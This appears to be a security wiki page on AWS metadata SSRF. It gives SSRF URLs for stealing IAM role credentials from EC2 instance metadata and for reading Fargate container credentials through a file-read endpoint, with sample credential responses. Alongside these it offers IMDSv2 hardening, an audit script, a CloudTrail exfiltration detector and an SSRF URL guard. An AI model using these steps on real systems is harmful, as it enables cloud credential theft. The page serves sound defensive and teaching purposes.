
AWS - Metadata SSRF

AWS has released additional security defenses against this attack.

⚠ Only works against IMDSv1.

Enabling IMDSv2

aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --profile <AWS_PROFILE> --http-endpoint enabled --http-tokens required

To use IMDSv2 you must first obtain a session token and send it with every metadata request:

export TOKEN=$(curl -s -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token")
curl -H "X-aws-ec2-metadata-token: $TOKEN" -v "http://169.254.169.254/latest/meta-data"
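The command above fixes one instance at a time. The following audit is an added example (not code from the original page): it walks the structure that boto3's ec2.describe_instances() returns and flags every instance whose MetadataOptions still answer IMDSv1 requests, then emits the matching modify-instance-metadata-options command. The sample reservations are constructed; the audit_live_account helper is the only part that needs boto3 and real credentials.

```python
"""Audit EC2 instances for metadata options that leave IMDSv1 reachable.

Added example, not from the original page. The data structure is the one
boto3's ec2.describe_instances() returns; the instances below are
constructed for the demonstration.
"""
from typing import Dict, Iterable, List, Optional

# Constructed sample in the shape of describe_instances()["Reservations"].
SAMPLE_RESERVATIONS = [
    {"Instances": [
        {"InstanceId": "i-0aaa111111111111a",
         "MetadataOptions": {"State": "applied", "HttpEndpoint": "enabled",
                             "HttpTokens": "required", "HttpPutResponseHopLimit": 1}},
        {"InstanceId": "i-0bbb222222222222b",
         "MetadataOptions": {"State": "applied", "HttpEndpoint": "enabled",
                             "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    ]},
    {"Instances": [
        {"InstanceId": "i-0ccc333333333333c",
         "MetadataOptions": {"State": "applied", "HttpEndpoint": "enabled",
                             "HttpTokens": "required", "HttpPutResponseHopLimit": 2}},
        {"InstanceId": "i-0ddd444444444444d",
         "MetadataOptions": {"State": "applied", "HttpEndpoint": "disabled",
                             "HttpTokens": "optional", "HttpPutResponseHopLimit": 1}},
    ]},
]

IMDSV1_ALLOWED = "IMDSv1 allowed (HttpTokens is not 'required')"
HOP_LIMIT_HIGH = "HttpPutResponseHopLimit > 1 (IMDSv2 token responses can reach containers behind host NAT)"


def audit_metadata_options(reservations: Iterable[dict]) -> Dict[str, List[str]]:
    """Return {instance_id: [findings]} for instances whose IMDS settings
    still permit token-less metadata access or loosen the hop limit."""
    findings: Dict[str, List[str]] = {}
    for reservation in reservations:
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # IMDS switched off entirely: nothing for an SSRF to reach
            issues = []
            if opts.get("HttpTokens") != "required":
                issues.append(IMDSV1_ALLOWED)
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                issues.append(HOP_LIMIT_HIGH)
            if issues:
                findings[inst["InstanceId"]] = issues
    return findings


def remediation_commands(findings: Dict[str, List[str]], profile: str = "default") -> List[str]:
    """One modify-instance-metadata-options call per flagged instance
    (the command shown on the page, plus a hop limit of 1)."""
    return [
        f"aws ec2 modify-instance-metadata-options --instance-id {iid} "
        f"--profile {profile} --http-endpoint enabled --http-tokens required "
        f"--http-put-response-hop-limit 1"
        for iid in sorted(findings)
    ]


def audit_live_account(profile: Optional[str] = None) -> Dict[str, List[str]]:
    """Run the audit against a real account (needs boto3 and AWS credentials)."""
    import boto3  # imported lazily so the offline demo needs no SDK

    ec2 = boto3.session.Session(profile_name=profile).client("ec2")

    def reservations():
        for page in ec2.get_paginator("describe_instances").paginate():
            yield from page["Reservations"]

    return audit_metadata_options(reservations())


if __name__ == "__main__":
    found = audit_metadata_options(SAMPLE_RESERVATIONS)
    for iid, issues in found.items():
        print(iid, "->", "; ".join(issues))
    print("\n".join(remediation_commands(found)))
```

An instance with HttpEndpoint disabled is skipped on purpose: without a metadata service there is nothing for the SSRF to reach, so it needs no remediation. The hop-limit finding is informational; lowering it to 1 also blocks legitimate IMDSv2 use from containers on a bridge network, so apply it only where no container needs instance credentials.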

Method for Elastic Cloud Compute (EC2)

Amazon provides an internal service that lets every EC2 instance query and retrieve metadata about its host. If you find an SSRF vulnerability in an application running on an EC2 instance, try fetching content from 169.254.169.254.

  1. Access the metadata tree: http://169.254.169.254/latest/meta-data/

    ami-id
    ami-launch-index
    ami-manifest-path
    block-device-mapping/
    events/
    hostname
    iam/
    identity-credentials/
    instance-action
    instance-id
    
  2. Find the name of the role attached to the instance: http://169.254.169.254/latest/meta-data/iam/security-credentials/

  3. Extract the role's temporary credentials (the role name from step 2 goes at the end of the path): http://169.254.169.254/latest/meta-data/iam/security-credentials//

    {
    "Code" : "Success",
    "LastUpdated" : "2019-07-31T23:08:10Z",
    "Type" : "AWS-HMAC",
    "AccessKeyId" : "ASIAREDACTEDXXXXXXXX",
    "SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXXXX",
    "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv",
    "Expiration" : "2019-08-01T05:20:30Z"
    }
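Credentials obtained this way are usually replayed from the attacker's own machine, which leaves a visible trace: CloudTrail records an assumed-role session whose name is the instance id, calling from an IP the instance never egresses from, and the sessionContext.ec2RoleDelivery field records whether IMDSv1 ("1.0") or IMDSv2 ("2.0") served the credentials. The following detector is an added example (not from the page): the CloudTrail records are constructed in CloudTrail's JSON shape, and KNOWN_EGRESS is an assumed inventory of the fleet's NAT and Elastic IP ranges that a real deployment would pull from its VPC configuration.

```python
"""Flag EC2 instance-role credentials used from an unexpected network location.

Added example, not from the page. Records below are constructed in
CloudTrail's JSON shape (account id and IPs are documentation values);
KNOWN_EGRESS is an assumed list of the ranges the fleet legitimately
calls AWS from.
"""
import ipaddress
import re
from typing import Dict, Iterable, List

# Assumed: public ranges (NAT gateways / EIPs) the instances egress through.
KNOWN_EGRESS = [ipaddress.ip_network("203.0.113.0/24")]

# Instance-profile sessions are named after the instance id.
INSTANCE_SESSION = re.compile(r":assumed-role/[^/]+/(i-[0-9a-f]{8,17})$")

ROLE_ARN = "arn:aws:sts::123456789012:assumed-role/awesome-waf-role/i-0bbb222222222222b"

# Constructed CloudTrail records.
SAMPLE_EVENTS = [
    # normal: instance calling from its own NAT range, credentials via IMDSv2
    {"eventID": "e1", "eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN,
                      "sessionContext": {"ec2RoleDelivery": "2.0"}}},
    # suspicious: same session replayed from an address outside the fleet
    {"eventID": "e2", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN,
                      "sessionContext": {"ec2RoleDelivery": "2.0"}}},
    # informational: credentials were handed out by IMDSv1
    {"eventID": "e3", "eventName": "GetCallerIdentity", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN,
                      "sessionContext": {"ec2RoleDelivery": "1.0"}}},
    # human session, not an instance profile: out of scope for this rule
    {"eventID": "e4", "eventName": "ListBuckets", "sourceIPAddress": "198.51.100.5",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::123456789012:assumed-role/admin-role/alice",
                      "sessionContext": {}}},
    # AWS service acting on the instance's behalf: sourceIPAddress is a DNS name
    {"eventID": "e5", "eventName": "PutObject", "sourceIPAddress": "lambda.amazonaws.com",
     "userIdentity": {"type": "AssumedRole", "arn": ROLE_ARN,
                      "sessionContext": {"ec2RoleDelivery": "2.0"}}},
]


def review_events(events: Iterable[dict], known_egress=KNOWN_EGRESS) -> List[Dict[str, str]]:
    """Return one alert per record that uses instance credentials from outside
    the known egress ranges, plus one per record served by IMDSv1."""
    alerts: List[Dict[str, str]] = []
    for ev in events:
        ident = ev.get("userIdentity", {})
        if ident.get("type") != "AssumedRole":
            continue
        match = INSTANCE_SESSION.search(ident.get("arn", ""))
        if not match:
            continue  # human or service session, not an instance profile
        instance_id = match.group(1)
        source = ev.get("sourceIPAddress", "")
        try:
            src_ip = ipaddress.ip_address(source)
        except ValueError:
            src_ip = None  # service principals log a DNS name instead of an IP
        if src_ip is not None and not any(src_ip in net for net in known_egress):
            alerts.append({"eventID": ev["eventID"], "instance": instance_id, "source": source,
                           "reason": "instance credentials used from outside known egress"})
        if ident.get("sessionContext", {}).get("ec2RoleDelivery") == "1.0":
            alerts.append({"eventID": ev["eventID"], "instance": instance_id, "source": source,
                           "reason": "credentials were served by IMDSv1"})
    return alerts


if __name__ == "__main__":
    for alert in review_events(SAMPLE_EVENTS):
        print(alert)
```

The egress allowlist is the weak point of this rule: calls routed through VPC endpoints log the instance's private IP, and a fleet behind several NAT gateways needs all of them listed, so build the list from the account's actual VPC inventory rather than by hand. GuardDuty's InstanceCredentialExfiltration findings implement the same idea as a managed service.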
    

Method for Container Service (Fargate)

  1. Use the file-read endpoint https://awesomeapp.com/download?file=/proc/self/environ to extract the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable:

    JAVA_ALPINE_VERSION=8.212.04-r0
    HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root
    AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447
    AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2
    ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd
    
  2. Use the credentials URL to dump the AccessKey and SecretKey: https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447

    {
        "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role",
        "AccessKeyId": "ASIAXXXXXXXXXX",
        "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt",
        "Token": "FQoGZXIvYXdzEMj/////...jHsYXsBQ==",
        "Expiration": "2019-09-18T04:05:59Z"
    }
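Both methods on this page go through a server-side fetcher (a /forward?target= or /download?file= style endpoint) that follows a user-supplied URL. The guard below is an added example (not from the page) of the application-side mitigation: it parses the target, resolves the host and refuses anything that lands on a non-public address, which covers 169.254.169.254 (IMDS), 169.254.170.2 (the ECS/Fargate credential endpoint) and fd00:ec2::254 (IPv6 IMDS), as well as file:// reads. The resolver is injectable, so the offline demo uses a constructed hostname table (FAKE_DNS) rather than real DNS; the address for example.com in it is a constructed value.

```python
"""Application-side guard for server-side fetchers: refuse metadata endpoints.

Added example, not from the page. resolve_host is the real resolver;
FAKE_DNS / fake_resolve are a constructed table so the demo runs offline.
"""
import ipaddress
import socket
from typing import Callable, Dict, List, Tuple, Union
from urllib.parse import urlsplit

IPAddr = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def resolve_host(host: str) -> List[IPAddr]:
    """Real resolver: every address getaddrinfo() would hand to connect()."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    # strip an IPv6 scope id such as "%eth0" before parsing
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


# Constructed DNS table so the example needs no network access.
FAKE_DNS: Dict[str, List[str]] = {
    "example.com": ["93.184.216.34"],          # constructed public address
    "localhost": ["127.0.0.1", "::1"],
    "metadata.internal": ["169.254.169.254"],  # a name that points at IMDS
}


def fake_resolve(host: str) -> List[IPAddr]:
    return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])]


def is_public(addr: IPAddr) -> bool:
    """True only for globally routable unicast addresses."""
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still IMDS
    return not (addr.is_link_local or addr.is_loopback or addr.is_private
                or addr.is_reserved or addr.is_unspecified or addr.is_multicast)


def check_url(url: str, resolve: Callable[[str], List[IPAddr]] = resolve_host) -> Tuple[bool, str]:
    """Decide whether a fetcher may follow `url`; returns (allowed, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname  # brackets stripped for IPv6, userinfo removed
    if not host:
        return False, "missing host"
    try:
        addrs: List[IPAddr] = [ipaddress.ip_address(host)]
    except ValueError:
        # names and shorthand numeric forms go through the resolver, so the
        # check sees the same addresses the socket layer would connect to
        addrs = resolve(host)
    if not addrs:
        return False, f"{host!r} does not resolve"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    for target in ("http://169.254.169.254/latest/meta-data/",
                   "http://169.254.170.2/v2/credentials/x",
                   "http://[fd00:ec2::254]/latest/meta-data/",
                   "file:///proc/self/environ",
                   "https://example.com/"):
        print(target, "->", check_url(target, fake_resolve))
```

Two caveats matter in practice: the fetcher must connect to the address that was vetted rather than resolving the name a second time (otherwise a DNS answer that changes between check and use slips through), and every redirect target must pass the same check before it is followed. Blocking all non-public ranges, not just the two metadata addresses, also keeps the same fetcher from being turned against other internal services.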
    

AWS API calls that return credentials

References